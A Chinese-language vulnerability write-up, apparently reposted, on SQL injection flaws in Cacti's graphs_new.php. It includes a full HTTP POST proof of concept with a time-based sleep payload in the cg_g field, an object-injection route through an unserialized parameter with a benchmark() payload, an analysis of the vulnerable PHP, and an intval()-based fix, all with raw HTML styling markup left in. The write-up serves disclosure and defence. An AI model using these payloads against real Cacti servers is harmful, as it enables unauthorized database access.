当前位置:Gxlcms > 数据库问题 > Cacti /graphs_new.php SQL Injection Vulnerability

Cacti /graphs_new.php SQL Injection Vulnerability

时间:2021-07-01 10:21:17 帮助过:2人阅读

. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考

 

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

  1. http:<span style="color: #008000;">//</span><span style="color: #008000;">bobao.360.cn/snapshot/index?id=146936</span>

 
2. 漏洞触发条件

0x1: POC1: SQL Inject

  1. POST /cacti/graphs_new.php HTTP/<span style="color: #800080;">1.1</span><span style="color: #000000;">
  2. Host: </span><span style="color: #800080;">192.168</span>.<span style="color: #800080;">217.133</span><span style="color: #000000;">
  3. Proxy</span>-Connection: keep-<span style="color: #000000;">alive
  4. Cache</span>-Control: max-age=<span style="color: #800080;">0</span><span style="color: #000000;">
  5. Accept: text</span>/html,application/xhtml+xml,application/xml;q=<span style="color: #800080;">0.9</span>,image/webp,*<span style="color: #008000;">/*</span><span style="color: #008000;">;q=0.8
  6. Origin: </span><span style="color: #008000; text-decoration: underline;">http://192.168.217.133</span><span style="color: #008000;"> [^]
  7. Upgrade-Insecure-Requests: 1
  8. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
  9. Content-Type: application/x-www-form-urlencoded
  10. DNT: 1
  11. Referer: </span><span style="color: #008000; text-decoration: underline;">http://192.168.217.133/cacti/graphs_new.php?host_id=3</span><span style="color: #008000;"> [^]
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
  14. Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
  15. Content-Length: 189
  16. __csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save</span>

0x2: POC2: Object Inject

  1. <span style="color: #800080;">1</span><span style="color: #000000;">. Login
  2. </span><span style="color: #800080;">2</span>. POST  http:<span style="color: #008000;">//</span><span style="color: #008000;">target/cacti/graphs_new.php</span>
  3.    Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=<span style="color: #800080;">1</span>&host_id=<span style="color: #800080;">1</span>&selected_graphs_array=<span style="color: #000000;">[injection]
  4.     {Injection exp can be found on my server: http:</span><span style="color: #008000;">//</span><span style="color: #008000;">pandas.pw/cacti.exp}</span>
  5. <span style="color: #800080;">3</span>. mysql log: <span style="color: #0000ff;">select</span> graph_template_id <span style="color: #0000ff;">from</span> snmp_query_graph <span style="color: #0000ff;">where</span> id=<span style="color: #800080;">1</span> and benchmark(<span style="color: #800080;">20000000</span>,sha1(<span style="color: #800080;">1</span>))--


3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

  1. <span style="color: #008000;">/*</span><span style="color: #008000;"> set default action </span><span style="color: #008000;">*/</span>
  2. <span style="color: #0000ff;">if</span> (!isset($_REQUEST[<span style="color: #800000;">"</span><span style="color: #800000;">action</span><span style="color: #800000;">"</span>])) { $_REQUEST[<span style="color: #800000;">"</span><span style="color: #800000;">action</span><span style="color: #800000;">"</span>] = <span style="color: #800000;">""</span><span style="color: #000000;">; }
  3. </span><span style="color: #0000ff;">switch</span> ($_REQUEST[<span style="color: #800000;">"</span><span style="color: #800000;">action</span><span style="color: #800000;">"</span><span style="color: #000000;">]) {
  4.     </span><span style="color: #0000ff;">case</span> <span style="color: #800000;">‘</span><span style="color: #800000;">save</span><span style="color: #800000;">‘</span><span style="color: #000000;">:
  5.         </span><span style="color: #008000;">//t</span><span style="color: #008000;">rack function form_save</span>
  6. <span style="color: #000000;">        form_save();
  7.         </span><span style="color: #0000ff;">break</span><span style="color: #000000;">;
  8.     </span><span style="color: #0000ff;">case</span> <span style="color: #800000;">‘</span><span style="color: #800000;">query_reload</span><span style="color: #800000;">‘</span><span style="color: #000000;">:
  9.         host_reload_query();
  10.         header(</span><span style="color: #800000;">"</span><span style="color: #800000;">Location: graphs_new.php?host_id=</span><span style="color: #800000;">"</span> . $_GET[<span style="color: #800000;">"</span><span style="color: #800000;">host_id</span><span style="color: #800000;">"</span><span style="color: #000000;">]);
  11.         </span><span style="color: #0000ff;">break</span><span style="color: #000000;">;
  12.     </span><span style="color: #0000ff;">default</span><span style="color: #000000;">:
  13.         include_once(</span><span style="color: #800000;">"</span><span style="color: #800000;">./include/top_header.php</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  14.         graphs();
  15.         include_once(</span><span style="color: #800000;">"</span><span style="color: #800000;">./include/bottom_footer.php</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  16.         </span><span style="color: #0000ff;">break</span><span style="color: #000000;">;
  17. }</span>

form_save();

  1. <span style="color: #000000;">function form_save() 
  2. {
  3.     ..
  4.     </span><span style="color: #0000ff;">if</span> (isset($_POST[<span style="color: #800000;">"</span><span style="color: #800000;">save_component_new_graphs</span><span style="color: #800000;">"</span><span style="color: #000000;">])) 
  5.     {
  6.         </span><span style="color: #008000;">//</span><span style="color: #008000;">Track function host_new_graphs_save()</span>
  7. <span style="color: #000000;">        host_new_graphs_save();
  8.         header(</span><span style="color: #800000;">"</span><span style="color: #800000;">Location: graphs_new.php?host_id=</span><span style="color: #800000;">"</span> . $_POST[<span style="color: #800000;">"</span><span style="color: #800000;">host_id</span><span style="color: #800000;">"</span><span style="color: #000000;">]);
  9.     }
  10. }</span>

host_new_graphs_save();

  1. <span style="color: #000000;">function host_new_graphs_save() 
  2. {
  3.     </span><span style="color: #008000;">//</span><span style="color: #008000;">variable $selected_graphs_array just unserialized the POST variable which we can control without filter.</span>
  4.     $selected_graphs_array = unserialize(stripslashes($_POST[<span style="color: #800000;">"</span><span style="color: #800000;">selected_graphs_array</span><span style="color: #800000;">"</span><span style="color: #000000;">]));
  5.     ..
  6.     </span><span style="color: #008000;">//</span><span style="color: #008000;">Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.</span>
  7.     $graph_template_id = db_fetch_cell(<span style="color: #800000;">"</span><span style="color: #800000;">select graph_template_id from snmp_query_graph where id=</span><span style="color: #800000;">"</span> . $snmp_query_array[<span style="color: #800000;">"</span><span style="color: #800000;">snmp_query_graph_id</span><span style="color: #800000;">"</span><span style="color: #000000;">]);
  8.     ..
  9. }</span>

0x2: Vuls-2: SQL Injection

  1. <span style="color: #000000;">function form_save() 
  2. {
  3.     </span><span style="color: #0000ff;">if</span> (isset($_POST[<span style="color: #800000;">"</span><span style="color: #800000;">save_component_graph</span><span style="color: #800000;">"</span><span style="color: #000000;">])) 
  4.     {
  5.         </span><span style="color: #008000;">/*</span><span style="color: #008000;"> summarize the ‘create graph from host template/snmp index‘ stuff into an array </span><span style="color: #008000;">*/</span>
  6.         <span style="color: #0000ff;">while</span> (list($<span style="color: #0000ff;">var</span>, $val) =<span style="color: #000000;"> each($_POST)) 
  7.         {
  8.             </span><span style="color: #0000ff;">if</span> (preg_match(<span style="color: #800000;">‘</span><span style="color: #800000;">/^cg_(\d+)$/</span><span style="color: #800000;">‘</span>, $<span style="color: #0000ff;">var</span><span style="color: #000000;">, $matches)) 
  9.             {
  10.                 $selected_graphs[</span><span style="color: #800000;">"</span><span style="color: #800000;">cg</span><span style="color: #800000;">"</span>]{$matches[<span style="color: #800080;">1</span>]}{$matches[<span style="color: #800080;">1</span>]} = <span style="color: #0000ff;">true</span><span style="color: #000000;">;
  11.             }
  12.             </span><span style="color: #008000;">//</span><span style="color: #008000;">cg_g is not filtered</span>
  13.             elseif (preg_match(<span style="color: #800000;">‘</span><span style="color: #800000;">/^cg_g$/</span><span style="color: #800000;">‘</span>, $<span style="color: #0000ff;">var</span><span style="color: #000000;">)) 
  14.             {
  15.                 </span><span style="color: #0000ff;">if</span> ($_POST[<span style="color: #800000;">"</span><span style="color: #800000;">cg_g</span><span style="color: #800000;">"</span>] > <span style="color: #800080;">0</span><span style="color: #000000;">) 
  16.                 {
  17.                     $selected_graphs[</span><span style="color: #800000;">"</span><span style="color: #800000;">cg</span><span style="color: #800000;">"</span>]{$_POST[<span style="color: #800000;">"</span><span style="color: #800000;">cg_g</span><span style="color: #800000;">"</span>]}{$_POST[<span style="color: #800000;">"</span><span style="color: #800000;">cg_g</span><span style="color: #800000;">"</span>]} = <span style="color: #0000ff;">true</span><span style="color: #000000;">;
  18.                 }
  19.             }
  20.             elseif (preg_match(</span><span style="color: #800000;">‘</span><span style="color: #800000;">/^sg_(\d+)_([a-f0-9]{32})$/</span><span style="color: #800000;">‘</span>, $<span style="color: #0000ff;">var</span><span style="color: #000000;">, $matches)) 
  21.             {
  22.                 $selected_graphs[</span><span style="color: #800000;">"</span><span style="color: #800000;">sg</span><span style="color: #800000;">"</span>]{$matches[<span style="color: #800080;">1</span>]}{$_POST{<span style="color: #800000;">"</span><span style="color: #800000;">sgg_</span><span style="color: #800000;">"</span> . $matches[<span style="color: #800080;">1</span>]}}{$matches[<span style="color: #800080;">2</span>]} = <span style="color: #0000ff;">true</span><span style="color: #000000;">;
  23.             }
  24.         }
  25.         </span><span style="color: #0000ff;">if</span><span style="color: #000000;"> (isset($selected_graphs)) 
  26.         {
  27.             </span><span style="color: #008000;">//</span><span style="color: #008000;">外部输入参数带入host_new_graphs中</span>
  28.             host_new_graphs($_POST[<span style="color: #800000;">"</span><span style="color: #800000;">host_id</span><span style="color: #800000;">"</span>], $_POST[<span style="color: #800000;">"</span><span style="color: #800000;">host_template_id</span><span style="color: #800000;">"</span><span style="color: #000000;">], $selected_graphs);
  29.             exit;
  30.         }
  31.         header(</span><span style="color: #800000;">"</span><span style="color: #800000;">Location: graphs_new.php?host_id=</span><span style="color: #800000;">"</span> . $_POST[<span style="color: #800000;">"</span><span style="color: #800000;">host_id</span><span style="color: #800000;">"</span><span style="color: #000000;">]);
  32.     }
  33.     </span><span style="color: #0000ff;">if</span> (isset($_POST[<span style="color: #800000;">"</span><span style="color: #800000;">save_component_new_graphs</span><span style="color: #800000;">"</span><span style="color: #000000;">])) {
  34.         host_new_graphs_save();
  35.         header(</span><span style="color: #800000;">"</span><span style="color: #800000;">Location: graphs_new.php?host_id=</span><span style="color: #800000;">"</span> . $_POST[<span style="color: #800000;">"</span><span style="color: #800000;">host_id</span><span style="color: #800000;">"</span><span style="color: #000000;">]);
  36.     }
  37. }</span>

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

  1. <span style="color: #000000;">function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
  2.     </span><span style="color: #008000;">/*</span><span style="color: #008000;"> we use object buffering on this page to allow redirection to another page if no
  3.     fields are actually drawn </span><span style="color: #008000;">*/</span><span style="color: #000000;">
  4.     ob_start();
  5.     include_once(</span><span style="color: #800000;">"</span><span style="color: #800000;">./include/top_header.php</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  6.     print </span><span style="color: #800000;">"</span><span style="color: #800000;"><form method=‘post‘ action=‘graphs_new.php‘>\n</span><span style="color: #800000;">"</span><span style="color: #000000;">;
  7.     $snmp_query_id </span>= <span style="color: #800080;">0</span><span style="color: #000000;">;
  8.     $num_output_fields </span>=<span style="color: #000000;"> array();
  9.     </span><span style="color: #0000ff;">while</span> (list($form_type, $form_array) =<span style="color: #000000;"> each($selected_graphs_array)) {
  10.         </span><span style="color: #0000ff;">while</span> (list($form_id1, $form_array2) =<span style="color: #000000;"> each($form_array)) {
  11.             </span><span style="color: #0000ff;">if</span> ($form_type == <span style="color: #800000;">"</span><span style="color: #800000;">cg</span><span style="color: #800000;">"</span><span style="color: #000000;">) {
  12.                 </span><span style="color: #008000;">//</span><span style="color: #008000;">sql injection in graph_template_id </span>
  13.                 $graph_template_id =<span style="color: #000000;"> $form_id1; 
  14.                 html_start_box(</span><span style="color: #800000;">"</span><span style="color: #800000;"><strong>Create Graph from ‘</span><span style="color: #800000;">"</span> . db_fetch_cell(<span style="color: #800000;">"</span><span style="color: #800000;">select name from graph_templates where id=$graph_template_id</span><span style="color: #800000;">"</span>) . <span style="color: #800000;">"</span><span style="color: #800000;">‘</span><span style="color: #800000;">"</span>, <span style="color: #800000;">"</span><span style="color: #800000;">100%</span><span style="color: #800000;">"</span>, <span style="color: #800000;">""</span>, <span style="color: #800000;">"</span><span style="color: #800000;">3</span><span style="color: #800000;">"</span>, <span style="color: #800000;">"</span><span style="color: #800000;">center</span><span style="color: #800000;">"</span>, <span style="color: #800000;">""</span>);

Relevant Link:

  1. http:<span style="color: #008000;">//</span><span style="color: #008000;">seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt</span>
  2. http:<span style="color: #008000;">//</span><span style="color: #008000;">bugs.cacti.net/view.php?id=2652</span>


5. 防御方法

/graphs_new.php

  1. <span style="color: #000000;">function host_new_graphs_save() 
  2. {
  3.     ..
  4.     </span><span style="color: #008000;">/*</span><span style="color: #008000;">$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);</span><span style="color: #008000;">*/</span><span style="color: #000000;">
  5.     $graph_template_id </span>= db_fetch_cell(<span style="color: #800000;">"</span><span style="color: #800000;">select graph_template_id from snmp_query_graph where id=</span><span style="color: #800000;">"</span> . intval($snmp_query_array[<span style="color: #800000;">"</span><span style="color: #800000;">snmp_query_graph_id</span><span style="color: #800000;">"</span><span style="color: #000000;">]));
  6.     ..
  7. }</span>

/graphs_new.php

  1. <span style="color: #000000;">function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
  2.     </span><span style="color: #008000;">/*</span><span style="color: #008000;"> we use object buffering on this page to allow redirection to another page if no
  3.     fields are actually drawn </span><span style="color: #008000;">*/</span><span style="color: #000000;">
  4.     ob_start();
  5.     include_once(</span><span style="color: #800000;">"</span><span style="color: #800000;">./include/top_header.php</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  6.     print </span><span style="color: #800000;">"</span><span style="color: #800000;"><form method=‘post‘ action=‘graphs_new.php‘>\n</span><span style="color: #800000;">"</span><span style="color: #000000;">;
  7.     $snmp_query_id </span>= <span style="color: #800080;">0</span><span style="color: #000000;">;
  8.     $num_output_fields </span>=<span style="color: #000000;"> array();
  9.     </span><span style="color: #0000ff;">while</span> (list($form_type, $form_array) =<span style="color: #000000;"> each($selected_graphs_array)) {
  10.         </span><span style="color: #0000ff;">while</span> (list($form_id1, $form_array2) =<span style="color: #000000;"> each($form_array)) {
  11.             </span><span style="color: #0000ff;">if</span> ($form_type == <span style="color: #800000;">"</span><span style="color: #800000;">cg</span><span style="color: #800000;">"</span><span style="color: #000000;">) {
  12.                 </span><span style="color: #008000;">//</span><span style="color: #008000;">sql injection in graph_template_id </span>
  13.                 $graph_template_id =<span style="color: #000000;"> $form_id1; 
  14.                 </span><span style="color: #008000;">/**/</span><span style="color: #000000;">
  15.                 $graph_template_id </span>=<span style="color: #000000;"> intval($graph_template_id);
  16.                 </span><span style="color: #008000;">/**/</span><span style="color: #000000;">
  17.                 html_start_box(</span><span style="color: #800000;">"</span><span style="color: #800000;"><strong>Create Graph from ‘</span><span style="color: #800000;">"</span> . db_fetch_cell(<span style="color: #800000;">"</span><span style="color: #800000;">select name from graph_templates where id=$graph_template_id</span><span style="color: #800000;">"</span>) . <span style="color: #800000;">"</span><span style="color: #800000;">‘</span><span style="color: #800000;">"</span>, <span style="color: #800000;">"</span><span style="color: #800000;">100%</span><span style="color: #800000;">"</span>, <span style="color: #800000;">""</span>, <span style="color: #800000;">"</span><span style="color: #800000;">3</span><span style="color: #800000;">"</span>, <span style="color: #800000;">"</span><span style="color: #800000;">center</span><span style="color: #800000;">"</span>, <span style="color: #800000;">""</span>);

Relevant Link:

  1. http:<span style="color: #008000;">//</span><span style="color: #008000;">www.cacti.net/download_cacti.php</span>


6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

 

Cacti /graphs_new.php SQL Injection Vulnerability

标签:

人气教程排行

本站所有资源全部来源于网络,若本站发布的内容侵害到您的隐私或者利益,请联系我们删除!